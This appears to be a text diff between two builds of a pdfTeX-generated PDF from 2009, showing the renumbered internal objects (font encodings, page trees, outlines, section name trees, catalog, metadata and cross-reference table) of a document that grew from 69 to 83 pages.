+/Encoding 1266 0 R +/CharProcs 1267 0 R >> endobj -1214 0 obj +1265 0 obj [44.27 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 76.42 0 0 0 70.83 0 0 0 0 0 0 37.74 126.28 82.01 0 82.01 82.01 54.29 61.09 0 82.01 ] endobj -1215 0 obj << +1266 0 obj << /Type /Encoding /Differences [39/a39 40/.notdef 97/a97 98/.notdef 101/a101 102/.notdef 108/a108/a109/a110 111/.notdef 112/a112/a113/a114/a115 116/.notdef 117/a117] >> endobj -1216 0 obj << -/a39 1203 0 R -/a97 1204 0 R -/a101 1205 0 R -/a108 1206 0 R -/a109 1207 0 R -/a110 1208 0 R -/a112 1209 0 R -/a113 1210 0 R -/a114 1211 0 R -/a115 1212 0 R -/a117 1213 0 R +1267 0 obj << +/a39 1254 0 R +/a97 1255 0 R +/a101 1256 0 R +/a108 1257 0 R +/a109 1258 0 R +/a110 1259 0 R +/a112 1260 0 R +/a113 1261 0 R +/a114 1262 0 R +/a115 1263 0 R +/a117 1264 0 R >> endobj -1217 0 obj << +1268 0 obj << /Length1 773 /Length2 667 /Length3 0 @@ -8344,7 +8731,7 @@ x òLª 2óRR+R+€.Ö×ËË/jQM­BZ~(Z îÒOJLÎ.ÎI,ÎÉA„M¢ÀO- aúÏÉ)¿¢Z×ÈRA×Ò hŸ¡¡™‚¹¹i-ŠÂäÒ¢¢Ô¼p†ŒŸ– ÙÔÔŠÔd®›×ò“­[²¦ok[YçºøÂ*V}Ο'Ö¾¼É~ bGÝìÌ”Ú`ÓyŠé%K^-|´µï°xöE ¯dë©ÂE[${ýzâ¾,^³µkÁ²ˆ ¦ûõn‹W6wMãý§­þÊópaØŒ9­¤­ö=žÕ©¬só‹rý žy)/œ¢ïû~ï·VÐ$-%)ó›+Øï2ЉWÞ}~YþÓŽúéÇm“ß½åã ^ìÖ¥~1ÍŽ;éKâ·'\±ie/j>s½×}´ÀÌY0ðM‚M÷ùÇ‘»o¯·Ù“÷°oõÙ˲¦Ç_ß[ÀáØåÏáúg–™°ÆjuæÈ“%1³OŸ–›·ûóšcîGúëX§É)Y23ÿM«Ršò•¡Š#Æ¡¢Œ§ºµùk…ç/•­Ó$½ï¿j»nÀèÎ=ÙðüŒæ7âÒ7Œ’?b“Üqh}îíc:¾óÿþÜ™ÓÑw#ŒÿòNÓÕÊM^>='ÿ‹Ú 1´ü¶Jþ“|çµ¥yW¯³±_>ÏóZl“;/G¾1«R Sê¹ß/ÎÇï~áðv×ö}®ž‡kïN×[0©jeüªº³'Î^W¿›±ZïgåµÁÔŠ6*žZ´0¿°‘Yyc•Ѭ7•ìšžú%¸o”N»pÂÝÍ`ñýÛ%w킾psù­ o8ðˆÑ6éT’Õ@¼ endstream endobj -1218 0 obj << +1269 0 obj << /Type /FontDescriptor /FontName /ODQOOH+CMSY10 /Flags 4 @@ -8356,186 +8743,197 @@ endobj /StemV 85 /XHeight 431 /CharSet (/backslash/bullet) -/FontFile 1217 0 R +/FontFile 1268 0 R >> endobj -425 0 obj << +420 0 obj << /Type /Font /Subtype /Type1 /BaseFont /ODQOOH+CMSY10 -/FontDescriptor 1218 0 R +/FontDescriptor 1269 0 R /FirstChar 15 /LastChar 110 -/Widths 751 0 R +/Widths 800 0 R >> endobj -349 0 obj << +345 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [306 0 R 388 0 R 410 0 R 420 0 R 430 0 R 440 0 R] +/Parent 1270 0 R +/Kids [302 0 R 384 0 R 405 0 R 415 0 R 425 0 R 435 0 R] >> endobj -459 0 obj << +453 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [455 0 R 464 0 R 469 0 R 473 0 R 477 0 R 481 0 R] +/Parent 1270 0 R +/Kids [450 0 R 455 0 R 460 0 R 464 0 R 468 0 R 472 0 R] >> endobj -488 0 obj << +479 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [485 0 R 492 0 R 496 0 R 500 0 R 505 0 R 509 0 R] +/Parent 1270 0 R +/Kids [476 0 R 483 0 R 487 0 R 491 0 R 496 0 R 500 0 R] >> endobj -516 0 obj << +507 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [513 0 R 518 0 R 525 0 R 530 0 R 534 0 R 538 0 R] +/Parent 1270 0 R +/Kids [504 0 R 509 0 R 516 0 R 521 0 R 525 0 R 529 0 R] >> endobj -545 0 obj << +536 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [542 0 R 547 0 R 551 0 R 555 0 R 559 0 R 563 0 R] +/Parent 1270 0 R +/Kids [533 0 R 538 0 R 542 0 R 546 0 R 550 0 R 554 0 R] >> endobj -571 0 obj << +562 0 obj << /Type /Pages /Count 6 -/Parent 1219 0 R -/Kids [568 0 R 573 0 R 577 0 R 581 0 R 585 0 R 589 0 R] +/Parent 1270 0 R +/Kids [559 0 R 564 0 R 568 0 R 572 0 R 576 0 R 580 0 R] >> endobj -596 0 obj << +587 0 obj << /Type /Pages /Count 6 -/Parent 1220 0 R -/Kids [593 0 R 599 0 R 603 0 R 607 0 R 611 0 R 615 0 R] +/Parent 1271 0 R +/Kids [584 0 R 590 0 R 594 0 R 598 0 R 602 0 R 606 0 R] >> endobj -622 0 obj << +613 0 obj << /Type /Pages /Count 6 -/Parent 1220 0 R -/Kids [619 0 R 624 0 R 628 0 R 632 0 R 636 0 R 640 0 R] +/Parent 1271 0 R +/Kids [610 0 R 615 0 R 619 0 R 623 0 R 627 0 R 631 0 R] >> endobj -647 0 obj << +638 0 obj << /Type /Pages /Count 6 -/Parent 1220 0 R -/Kids [644 0 R 649 0 R 653 0 R 657 0 R 661 0 R 665 0 R] +/Parent 1271 0 R +/Kids [635 0 R 640 0 R 644 0 R 648 0 R 652 0 R 656 0 R] >> endobj -672 0 obj << +663 0 obj << /Type /Pages /Count 6 -/Parent 1220 0 R -/Kids [669 0 R 674 0 R 678 0 R 682 0 R 687 0 R 693 0 R] +/Parent 1271 0 R +/Kids [660 0 R 665 0 R 669 0 R 673 0 R 678 0 R 682 0 R] >> endobj -711 0 obj << +690 0 obj << /Type /Pages /Count 6 -/Parent 1220 0 R -/Kids [703 0 R 713 0 R 718 0 R 723 0 R 727 0 R 731 0 R] +/Parent 1271 0 R +/Kids [687 0 R 693 0 R 697 0 R 701 0 R 705 0 R 709 0 R] >> endobj -738 0 obj << +718 0 obj << /Type /Pages -/Count 3 -/Parent 1220 0 R -/Kids [735 0 R 741 0 R 748 0 R] +/Count 6 +/Parent 1271 0 R +/Kids [715 0 R 720 0 R 729 0 R 733 0 R 740 0 R 744 0 R] >> endobj -1219 0 obj << +751 0 obj << +/Type /Pages +/Count 6 +/Parent 1272 0 R +/Kids [748 0 R 756 0 R 760 0 R 764 0 R 769 0 R 774 0 R] +>> endobj +781 0 obj << +/Type /Pages +/Count 5 +/Parent 1272 0 R +/Kids [778 0 R 783 0 R 787 0 R 791 0 R 797 0 R] +>> endobj +1270 0 obj << /Type /Pages /Count 36 -/Parent 1221 0 R -/Kids [349 0 R 459 0 R 488 0 R 516 0 R 545 0 R 571 0 R] +/Parent 1273 0 R +/Kids [345 0 R 453 0 R 479 0 R 507 0 R 536 0 R 562 0 R] >> endobj -1220 0 obj << +1271 0 obj << /Type /Pages -/Count 33 -/Parent 1221 0 R -/Kids [596 0 R 622 0 R 647 0 R 672 0 R 711 0 R 738 0 R] +/Count 36 +/Parent 1273 0 R +/Kids [587 0 R 613 0 R 638 0 R 663 0 R 690 0 R 718 0 R] >> endobj -1221 0 obj << +1272 0 obj << /Type /Pages -/Count 69 -/Kids [1219 0 R 1220 0 R] +/Count 11 +/Parent 1273 0 R +/Kids [751 0 R 781 0 R] >> endobj -1222 0 obj << +1273 0 obj << +/Type /Pages +/Count 83 +/Kids [1270 0 R 1271 0 R 1272 0 R] +>> endobj +1274 0 obj << /Type /Outlines /First 7 0 R -/Last 303 0 R +/Last 299 0 R /Count 7 >> endobj -303 0 obj << -/Title 304 0 R -/A 301 0 R -/Parent 1222 0 R -/Prev 299 0 R ->> endobj 299 0 obj << /Title 300 0 R /A 297 0 R -/Parent 1222 0 R -/Prev 47 0 R -/Next 303 0 R +/Parent 1274 0 R +/Prev 295 0 R >> endobj 295 0 obj << /Title 296 0 R /A 293 0 R -/Parent 271 0 R -/Prev 291 0 R +/Parent 1274 0 R +/Prev 47 0 R +/Next 299 0 R >> endobj 291 0 obj << /Title 292 0 R /A 289 0 R -/Parent 271 0 R +/Parent 267 0 R /Prev 287 0 R -/Next 295 0 R >> endobj 287 0 obj << /Title 288 0 R /A 285 0 R -/Parent 271 0 R +/Parent 267 0 R /Prev 283 0 R /Next 291 0 R >> endobj 283 0 obj << /Title 284 0 R /A 281 0 R -/Parent 271 0 R +/Parent 267 0 R /Prev 279 0 R /Next 287 0 R >> endobj 279 0 obj << /Title 280 0 R /A 277 0 R -/Parent 271 0 R +/Parent 267 0 R /Prev 275 0 R /Next 283 0 R >> endobj 275 0 obj << /Title 276 0 R /A 273 0 R -/Parent 271 0 R +/Parent 267 0 R +/Prev 271 0 R /Next 279 0 R >> endobj 271 0 obj << /Title 272 0 R /A 269 0 R -/Parent 47 0 R -/Prev 247 0 R -/First 275 0 R -/Last 295 0 R -/Count -6 +/Parent 267 0 R +/Next 275 0 R >> endobj 267 0 obj << /Title 268 0 R /A 265 0 R -/Parent 247 0 R -/Prev 263 0 R +/Parent 47 0 R +/Prev 247 0 R +/First 271 0 R +/Last 291 0 R +/Count -6 >> endobj 263 0 obj << /Title 264 0 R /A 261 0 R /Parent 247 0 R /Prev 259 0 R -/Next 267 0 R >> endobj 259 0 obj << /Title 260 0 R @@ -8562,10 +8960,10 @@ endobj /A 245 0 R /Parent 47 0 R /Prev 235 0 R -/Next 271 0 R +/Next 267 0 R /First 251 0 R -/Last 267 0 R -/Count -5 +/Last 263 0 R +/Count -4 >> endobj 243 0 obj << /Title 244 0 R @@ -8919,24 +9317,24 @@ endobj 47 0 obj << /Title 48 0 R /A 45 0 R -/Parent 1222 0 R +/Parent 1274 0 R /Prev 43 0 R -/Next 299 0 R +/Next 295 0 R /First 51 0 R -/Last 271 0 R +/Last 267 0 R /Count -10 >> endobj 43 0 obj << /Title 44 0 R /A 41 0 R -/Parent 1222 0 R +/Parent 1274 0 R /Prev 39 0 R /Next 47 0 R >> endobj 39 0 obj << /Title 40 0 R /A 37 0 R -/Parent 1222 0 R +/Parent 1274 0 R /Prev 23 0 R /Next 43 0 R >> endobj @@ -8962,7 +9360,7 @@ endobj 23 0 obj << /Title 24 0 R /A 21 0 R -/Parent 1222 0 R +/Parent 1274 0 R /Prev 7 0 R /Next 39 0 R /First 27 0 R @@ -8991,1418 +9389,1480 @@ endobj 7 0 obj << /Title 8 0 R /A 5 0 R -/Parent 1222 0 R +/Parent 1274 0 R /Next 23 0 R /First 11 0 R /Last 19 0 R /Count -3 >> endobj -1223 0 obj << -/Names [(Doc-Start) 341 0 R (page.1) 340 0 R (page.10) 475 0 R (page.11) 479 0 R (page.12) 483 0 R (page.13) 487 0 R] +1275 0 obj << +/Names [(Doc-Start) 337 0 R (page.1) 336 0 R (page.10) 466 0 R (page.11) 470 0 R (page.12) 474 0 R (page.13) 478 0 R] /Limits [(Doc-Start) (page.13)] >> endobj -1224 0 obj << -/Names [(page.14) 494 0 R (page.15) 498 0 R (page.16) 502 0 R (page.17) 507 0 R (page.18) 511 0 R (page.19) 515 0 R] +1276 0 obj << +/Names [(page.14) 485 0 R (page.15) 489 0 R (page.16) 493 0 R (page.17) 498 0 R (page.18) 502 0 R (page.19) 506 0 R] /Limits [(page.14) (page.19)] >> endobj -1225 0 obj << -/Names [(page.2) 390 0 R (page.20) 520 0 R (page.21) 527 0 R (page.22) 532 0 R (page.23) 536 0 R (page.24) 540 0 R] +1277 0 obj << +/Names [(page.2) 386 0 R (page.20) 511 0 R (page.21) 518 0 R (page.22) 523 0 R (page.23) 527 0 R (page.24) 531 0 R] /Limits [(page.2) (page.24)] >> endobj -1226 0 obj << -/Names [(page.25) 544 0 R (page.26) 549 0 R (page.27) 553 0 R (page.28) 557 0 R (page.29) 561 0 R (page.3) 412 0 R] +1278 0 obj << +/Names [(page.25) 535 0 R (page.26) 540 0 R (page.27) 544 0 R (page.28) 548 0 R (page.29) 552 0 R (page.3) 407 0 R] /Limits [(page.25) (page.3)] >> endobj -1227 0 obj << -/Names [(page.30) 565 0 R (page.31) 570 0 R (page.32) 575 0 R (page.33) 579 0 R (page.34) 583 0 R (page.35) 587 0 R] +1279 0 obj << +/Names [(page.30) 556 0 R (page.31) 561 0 R (page.32) 566 0 R (page.33) 570 0 R (page.34) 574 0 R (page.35) 578 0 R] /Limits [(page.30) (page.35)] >> endobj -1228 0 obj << -/Names [(page.36) 591 0 R (page.37) 595 0 R (page.38) 601 0 R (page.39) 605 0 R (page.4) 422 0 R (page.40) 609 0 R] +1280 0 obj << +/Names [(page.36) 582 0 R (page.37) 586 0 R (page.38) 592 0 R (page.39) 596 0 R (page.4) 417 0 R (page.40) 600 0 R] /Limits [(page.36) (page.40)] >> endobj -1229 0 obj << -/Names [(page.41) 613 0 R (page.42) 617 0 R (page.43) 621 0 R (page.44) 626 0 R (page.45) 630 0 R (page.46) 634 0 R] +1281 0 obj << +/Names [(page.41) 604 0 R (page.42) 608 0 R (page.43) 612 0 R (page.44) 617 0 R (page.45) 621 0 R (page.46) 625 0 R] /Limits [(page.41) (page.46)] >> endobj -1230 0 obj << -/Names [(page.47) 638 0 R (page.48) 642 0 R (page.49) 646 0 R (page.5) 432 0 R (page.50) 651 0 R (page.51) 655 0 R] +1282 0 obj << +/Names [(page.47) 629 0 R (page.48) 633 0 R (page.49) 637 0 R (page.5) 427 0 R (page.50) 642 0 R (page.51) 646 0 R] /Limits [(page.47) (page.51)] >> endobj -1231 0 obj << -/Names [(page.52) 659 0 R (page.53) 663 0 R (page.54) 667 0 R (page.55) 671 0 R (page.56) 676 0 R (page.57) 680 0 R] +1283 0 obj << +/Names [(page.52) 650 0 R (page.53) 654 0 R (page.54) 658 0 R (page.55) 662 0 R (page.56) 667 0 R (page.57) 671 0 R] /Limits [(page.52) (page.57)] >> endobj -1232 0 obj << -/Names [(page.58) 684 0 R (page.59) 689 0 R (page.6) 442 0 R (page.60) 695 0 R (page.61) 705 0 R (page.62) 715 0 R] +1284 0 obj << +/Names [(page.58) 675 0 R (page.59) 680 0 R (page.6) 437 0 R (page.60) 684 0 R (page.61) 689 0 R (page.62) 695 0 R] /Limits [(page.58) (page.62)] >> endobj -1233 0 obj << -/Names [(page.63) 720 0 R (page.64) 725 0 R (page.65) 729 0 R (page.66) 733 0 R (page.67) 737 0 R (page.68) 743 0 R] +1285 0 obj << +/Names [(page.63) 699 0 R (page.64) 703 0 R (page.65) 707 0 R (page.66) 711 0 R (page.67) 717 0 R (page.68) 722 0 R] /Limits [(page.63) (page.68)] >> endobj -1234 0 obj << -/Names [(page.69) 750 0 R (page.7) 457 0 R (page.8) 466 0 R (page.9) 471 0 R (section*.1) 346 0 R (section.1) 6 0 R] -/Limits [(page.69) (section.1)] +1286 0 obj << +/Names [(page.69) 731 0 R (page.7) 452 0 R (page.70) 735 0 R (page.71) 742 0 R (page.72) 746 0 R (page.73) 750 0 R] +/Limits [(page.69) (page.73)] >> endobj -1235 0 obj << -/Names [(section.2) 22 0 R (section.3) 38 0 R (section.4) 42 0 R (section.5) 46 0 R (section.6) 298 0 R (section.7) 302 0 R] -/Limits [(section.2) (section.7)] +1287 0 obj << +/Names [(page.74) 758 0 R (page.75) 762 0 R (page.76) 766 0 R (page.77) 771 0 R (page.78) 776 0 R (page.79) 780 0 R] +/Limits [(page.74) (page.79)] >> endobj -1236 0 obj << -/Names [(subsection.1.1) 10 0 R (subsection.1.2) 14 0 R (subsection.1.3) 18 0 R (subsection.2.1) 26 0 R (subsection.2.2) 30 0 R (subsection.2.3) 34 0 R] -/Limits [(subsection.1.1) (subsection.2.3)] +1288 0 obj << +/Names [(page.8) 457 0 R (page.80) 785 0 R (page.81) 789 0 R (page.82) 793 0 R (page.83) 799 0 R (page.9) 462 0 R] +/Limits [(page.8) (page.9)] >> endobj -1237 0 obj << -/Names [(subsection.5.1) 50 0 R (subsection.5.10) 270 0 R (subsection.5.2) 54 0 R (subsection.5.3) 74 0 R (subsection.5.4) 122 0 R (subsection.5.5) 150 0 R] -/Limits [(subsection.5.1) (subsection.5.5)] +1289 0 obj << +/Names [(section*.1) 342 0 R (section.1) 6 0 R (section.2) 22 0 R (section.3) 38 0 R (section.4) 42 0 R (section.5) 46 0 R] +/Limits [(section*.1) (section.5)] >> endobj -1238 0 obj << -/Names [(subsection.5.6) 170 0 R (subsection.5.7) 178 0 R (subsection.5.8) 234 0 R (subsection.5.9) 246 0 R (subsubsection.5.10.1) 274 0 R (subsubsection.5.10.2) 278 0 R] -/Limits [(subsection.5.6) (subsubsection.5.10.2)] +1290 0 obj << +/Names [(section.6) 294 0 R (section.7) 298 0 R (subsection.1.1) 10 0 R (subsection.1.2) 14 0 R (subsection.1.3) 18 0 R (subsection.2.1) 26 0 R] +/Limits [(section.6) (subsection.2.1)] >> endobj -1239 0 obj << -/Names [(subsubsection.5.10.3) 282 0 R (subsubsection.5.10.4) 286 0 R (subsubsection.5.10.5) 290 0 R (subsubsection.5.10.6) 294 0 R (subsubsection.5.2.1) 58 0 R (subsubsection.5.2.2) 62 0 R] -/Limits [(subsubsection.5.10.3) (subsubsection.5.2.2)] +1291 0 obj << +/Names [(subsection.2.2) 30 0 R (subsection.2.3) 34 0 R (subsection.5.1) 50 0 R (subsection.5.10) 266 0 R (subsection.5.2) 54 0 R (subsection.5.3) 74 0 R] +/Limits [(subsection.2.2) (subsection.5.3)] >> endobj -1240 0 obj << -/Names [(subsubsection.5.2.3) 66 0 R (subsubsection.5.2.4) 70 0 R (subsubsection.5.3.1) 78 0 R (subsubsection.5.3.10) 114 0 R (subsubsection.5.3.11) 118 0 R (subsubsection.5.3.2) 82 0 R] -/Limits [(subsubsection.5.2.3) (subsubsection.5.3.2)] +1292 0 obj << +/Names [(subsection.5.4) 122 0 R (subsection.5.5) 150 0 R (subsection.5.6) 170 0 R (subsection.5.7) 178 0 R (subsection.5.8) 234 0 R (subsection.5.9) 246 0 R] +/Limits [(subsection.5.4) (subsection.5.9)] >> endobj -1241 0 obj << -/Names [(subsubsection.5.3.3) 86 0 R (subsubsection.5.3.4) 90 0 R (subsubsection.5.3.5) 94 0 R (subsubsection.5.3.6) 98 0 R (subsubsection.5.3.7) 102 0 R (subsubsection.5.3.8) 106 0 R] -/Limits [(subsubsection.5.3.3) (subsubsection.5.3.8)] +1293 0 obj << +/Names [(subsubsection.5.10.1) 270 0 R (subsubsection.5.10.2) 274 0 R (subsubsection.5.10.3) 278 0 R (subsubsection.5.10.4) 282 0 R (subsubsection.5.10.5) 286 0 R (subsubsection.5.10.6) 290 0 R] +/Limits [(subsubsection.5.10.1) (subsubsection.5.10.6)] >> endobj -1242 0 obj << -/Names [(subsubsection.5.3.9) 110 0 R (subsubsection.5.4.1) 126 0 R (subsubsection.5.4.2) 130 0 R (subsubsection.5.4.3) 134 0 R (subsubsection.5.4.4) 138 0 R (subsubsection.5.4.5) 142 0 R] -/Limits [(subsubsection.5.3.9) (subsubsection.5.4.5)] +1294 0 obj << +/Names [(subsubsection.5.2.1) 58 0 R (subsubsection.5.2.2) 62 0 R (subsubsection.5.2.3) 66 0 R (subsubsection.5.2.4) 70 0 R (subsubsection.5.3.1) 78 0 R (subsubsection.5.3.10) 114 0 R] +/Limits [(subsubsection.5.2.1) (subsubsection.5.3.10)] >> endobj -1243 0 obj << -/Names [(subsubsection.5.4.6) 146 0 R (subsubsection.5.5.1) 154 0 R (subsubsection.5.5.2) 158 0 R (subsubsection.5.5.3) 162 0 R (subsubsection.5.5.4) 166 0 R (subsubsection.5.6.1) 174 0 R] -/Limits [(subsubsection.5.4.6) (subsubsection.5.6.1)] +1295 0 obj << +/Names [(subsubsection.5.3.11) 118 0 R (subsubsection.5.3.2) 82 0 R (subsubsection.5.3.3) 86 0 R (subsubsection.5.3.4) 90 0 R (subsubsection.5.3.5) 94 0 R (subsubsection.5.3.6) 98 0 R] +/Limits [(subsubsection.5.3.11) (subsubsection.5.3.6)] >> endobj -1244 0 obj << -/Names [(subsubsection.5.7.1) 182 0 R (subsubsection.5.7.10) 218 0 R (subsubsection.5.7.11) 222 0 R (subsubsection.5.7.12) 226 0 R (subsubsection.5.7.13) 230 0 R (subsubsection.5.7.2) 186 0 R] -/Limits [(subsubsection.5.7.1) (subsubsection.5.7.2)] +1296 0 obj << +/Names [(subsubsection.5.3.7) 102 0 R (subsubsection.5.3.8) 106 0 R (subsubsection.5.3.9) 110 0 R (subsubsection.5.4.1) 126 0 R (subsubsection.5.4.2) 130 0 R (subsubsection.5.4.3) 134 0 R] +/Limits [(subsubsection.5.3.7) (subsubsection.5.4.3)] >> endobj -1245 0 obj << -/Names [(subsubsection.5.7.3) 190 0 R (subsubsection.5.7.4) 194 0 R (subsubsection.5.7.5) 198 0 R (subsubsection.5.7.6) 202 0 R (subsubsection.5.7.7) 206 0 R (subsubsection.5.7.8) 210 0 R] -/Limits [(subsubsection.5.7.3) (subsubsection.5.7.8)] +1297 0 obj << +/Names [(subsubsection.5.4.4) 138 0 R (subsubsection.5.4.5) 142 0 R (subsubsection.5.4.6) 146 0 R (subsubsection.5.5.1) 154 0 R (subsubsection.5.5.2) 158 0 R (subsubsection.5.5.3) 162 0 R] +/Limits [(subsubsection.5.4.4) (subsubsection.5.5.3)] >> endobj -1246 0 obj << -/Names [(subsubsection.5.7.9) 214 0 R (subsubsection.5.8.1) 238 0 R (subsubsection.5.8.2) 242 0 R (subsubsection.5.9.1) 250 0 R (subsubsection.5.9.2) 254 0 R (subsubsection.5.9.3) 258 0 R] -/Limits [(subsubsection.5.7.9) (subsubsection.5.9.3)] +1298 0 obj << +/Names [(subsubsection.5.5.4) 166 0 R (subsubsection.5.6.1) 174 0 R (subsubsection.5.7.1) 182 0 R (subsubsection.5.7.10) 218 0 R (subsubsection.5.7.11) 222 0 R (subsubsection.5.7.12) 226 0 R] +/Limits [(subsubsection.5.5.4) (subsubsection.5.7.12)] >> endobj -1247 0 obj << -/Names [(subsubsection.5.9.4) 262 0 R (subsubsection.5.9.5) 266 0 R] -/Limits [(subsubsection.5.9.4) (subsubsection.5.9.5)] +1299 0 obj << +/Names [(subsubsection.5.7.13) 230 0 R (subsubsection.5.7.2) 186 0 R (subsubsection.5.7.3) 190 0 R (subsubsection.5.7.4) 194 0 R (subsubsection.5.7.5) 198 0 R (subsubsection.5.7.6) 202 0 R] +/Limits [(subsubsection.5.7.13) (subsubsection.5.7.6)] >> endobj -1248 0 obj << -/Kids [1223 0 R 1224 0 R 1225 0 R 1226 0 R 1227 0 R 1228 0 R] +1300 0 obj << +/Names [(subsubsection.5.7.7) 206 0 R (subsubsection.5.7.8) 210 0 R (subsubsection.5.7.9) 214 0 R (subsubsection.5.8.1) 238 0 R (subsubsection.5.8.2) 242 0 R (subsubsection.5.9.1) 250 0 R] +/Limits [(subsubsection.5.7.7) (subsubsection.5.9.1)] +>> endobj +1301 0 obj << +/Names [(subsubsection.5.9.2) 254 0 R (subsubsection.5.9.3) 258 0 R (subsubsection.5.9.4) 262 0 R] +/Limits [(subsubsection.5.9.2) (subsubsection.5.9.4)] +>> endobj +1302 0 obj << +/Kids [1275 0 R 1276 0 R 1277 0 R 1278 0 R 1279 0 R 1280 0 R] /Limits [(Doc-Start) (page.40)] >> endobj -1249 0 obj << -/Kids [1229 0 R 1230 0 R 1231 0 R 1232 0 R 1233 0 R 1234 0 R] -/Limits [(page.41) (section.1)] +1303 0 obj << +/Kids [1281 0 R 1282 0 R 1283 0 R 1284 0 R 1285 0 R 1286 0 R] +/Limits [(page.41) (page.73)] >> endobj -1250 0 obj << -/Kids [1235 0 R 1236 0 R 1237 0 R 1238 0 R 1239 0 R 1240 0 R] -/Limits [(section.2) (subsubsection.5.3.2)] +1304 0 obj << +/Kids [1287 0 R 1288 0 R 1289 0 R 1290 0 R 1291 0 R 1292 0 R] +/Limits [(page.74) (subsection.5.9)] >> endobj -1251 0 obj << -/Kids [1241 0 R 1242 0 R 1243 0 R 1244 0 R 1245 0 R 1246 0 R] -/Limits [(subsubsection.5.3.3) (subsubsection.5.9.3)] +1305 0 obj << +/Kids [1293 0 R 1294 0 R 1295 0 R 1296 0 R 1297 0 R 1298 0 R] +/Limits [(subsubsection.5.10.1) (subsubsection.5.7.12)] >> endobj -1252 0 obj << -/Kids [1247 0 R] -/Limits [(subsubsection.5.9.4) (subsubsection.5.9.5)] +1306 0 obj << +/Kids [1299 0 R 1300 0 R 1301 0 R] +/Limits [(subsubsection.5.7.13) (subsubsection.5.9.4)] >> endobj -1253 0 obj << -/Kids [1248 0 R 1249 0 R 1250 0 R 1251 0 R 1252 0 R] -/Limits [(Doc-Start) (subsubsection.5.9.5)] +1307 0 obj << +/Kids [1302 0 R 1303 0 R 1304 0 R 1305 0 R 1306 0 R] +/Limits [(Doc-Start) (subsubsection.5.9.4)] >> endobj -1254 0 obj << -/Dests 1253 0 R +1308 0 obj << +/Dests 1307 0 R >> endobj -1255 0 obj << +1309 0 obj << /Type /Catalog -/Pages 1221 0 R -/Outlines 1222 0 R -/Names 1254 0 R +/Pages 1273 0 R +/Outlines 1274 0 R +/Names 1308 0 R /PageMode/UseOutlines -/OpenAction 305 0 R +/OpenAction 301 0 R >> endobj -1256 0 obj << +1310 0 obj << /Author()/Title()/Subject()/Creator(LaTeX with hyperref package)/Producer(pdfTeX-1.40.3)/Keywords() -/CreationDate (D:20090725012418+01'00') -/ModDate (D:20090725012418+01'00') +/CreationDate (D:20090725153046+01'00') +/ModDate (D:20090725153046+01'00') /Trapped /False /PTEX.Fullbanner (This is pdfTeX using libpoppler, Version 3.141592-1.40.3-2.2 (Web2C 7.5.6) kpathsea version 3.5.6) >> endobj xref -0 1257 +0 1311 0000000001 65535 f 0000000002 00000 f 0000000003 00000 f 0000000004 00000 f 0000000000 00000 f 0000000015 00000 n -0000029277 00000 n -0000325275 00000 n +0000029030 00000 n +0000354780 00000 n 0000000060 00000 n 0000000090 00000 n -0000029332 00000 n -0000325203 00000 n +0000029085 00000 n +0000354708 00000 n 0000000140 00000 n 0000000171 00000 n -0000029388 00000 n -0000325117 00000 n +0000029141 00000 n +0000354622 00000 n 0000000222 00000 n 0000000249 00000 n -0000038022 00000 n -0000325044 00000 n +0000037773 00000 n +0000354549 00000 n 0000000300 00000 n 0000000329 00000 n -0000038078 00000 n -0000324919 00000 n +0000037829 00000 n +0000354424 00000 n 0000000375 00000 n 0000000402 00000 n -0000038134 00000 n -0000324845 00000 n +0000037885 00000 n +0000354350 00000 n 0000000453 00000 n 0000000488 00000 n -0000043039 00000 n -0000324758 00000 n +0000042790 00000 n +0000354263 00000 n 0000000539 00000 n 0000000578 00000 n -0000048914 00000 n -0000324684 00000 n +0000047574 00000 n +0000354189 00000 n 0000000629 00000 n 0000000665 00000 n -0000048970 00000 n -0000324595 00000 n +0000047630 00000 n +0000354100 00000 n 0000000711 00000 n 0000000749 00000 n -0000051871 00000 n -0000324506 00000 n +0000050577 00000 n +0000354011 00000 n 0000000795 00000 n 0000000835 00000 n -0000051927 00000 n -0000324377 00000 n +0000050633 00000 n +0000353882 00000 n 0000000881 00000 n 0000000905 00000 n -0000056359 00000 n -0000324303 00000 n +0000055092 00000 n +0000353808 00000 n 0000000956 00000 n 0000000991 00000 n -0000063336 00000 n -0000324179 00000 n +0000062026 00000 n +0000353684 00000 n 0000001042 00000 n 0000001067 00000 n -0000063392 00000 n -0000324105 00000 n +0000062082 00000 n +0000353610 00000 n 0000001123 00000 n 0000001152 00000 n -0000063447 00000 n -0000324018 00000 n +0000062138 00000 n +0000353523 00000 n 0000001208 00000 n 0000001268 00000 n -0000065578 00000 n -0000323931 00000 n +0000064275 00000 n +0000353436 00000 n 0000001324 00000 n 0000001385 00000 n -0000067636 00000 n -0000323857 00000 n +0000066356 00000 n +0000353362 00000 n 0000001441 00000 n 0000001502 00000 n -0000067692 00000 n -0000323730 00000 n +0000066412 00000 n +0000353235 00000 n 0000001553 00000 n 0000001579 00000 n -0000067748 00000 n -0000323656 00000 n +0000066468 00000 n +0000353161 00000 n 0000001635 00000 n 0000001678 00000 n -0000070373 00000 n -0000323569 00000 n +0000069066 00000 n +0000353074 00000 n 0000001734 00000 n 0000001771 00000 n -0000072300 00000 n -0000323482 00000 n +0000070991 00000 n +0000352987 00000 n 0000001827 00000 n 0000001865 00000 n -0000074218 00000 n -0000323395 00000 n +0000072906 00000 n +0000352900 00000 n 0000001921 00000 n 0000001962 00000 n -0000076845 00000 n -0000323308 00000 n +0000075533 00000 n +0000352813 00000 n 0000002018 00000 n 0000002055 00000 n -0000076901 00000 n -0000323219 00000 n +0000075589 00000 n +0000352724 00000 n 0000002111 00000 n 0000002168 00000 n -0000079563 00000 n -0000323128 00000 n +0000078249 00000 n +0000352633 00000 n 0000002225 00000 n 0000002255 00000 n -0000082237 00000 n -0000323036 00000 n +0000080923 00000 n +0000352541 00000 n 0000002312 00000 n 0000002356 00000 n -0000082294 00000 n -0000322944 00000 n +0000080980 00000 n +0000352449 00000 n 0000002413 00000 n 0000002475 00000 n -0000082351 00000 n -0000322852 00000 n +0000081037 00000 n +0000352357 00000 n 0000002533 00000 n 0000002594 00000 n -0000082408 00000 n -0000322774 00000 n +0000081094 00000 n +0000352279 00000 n 0000002652 00000 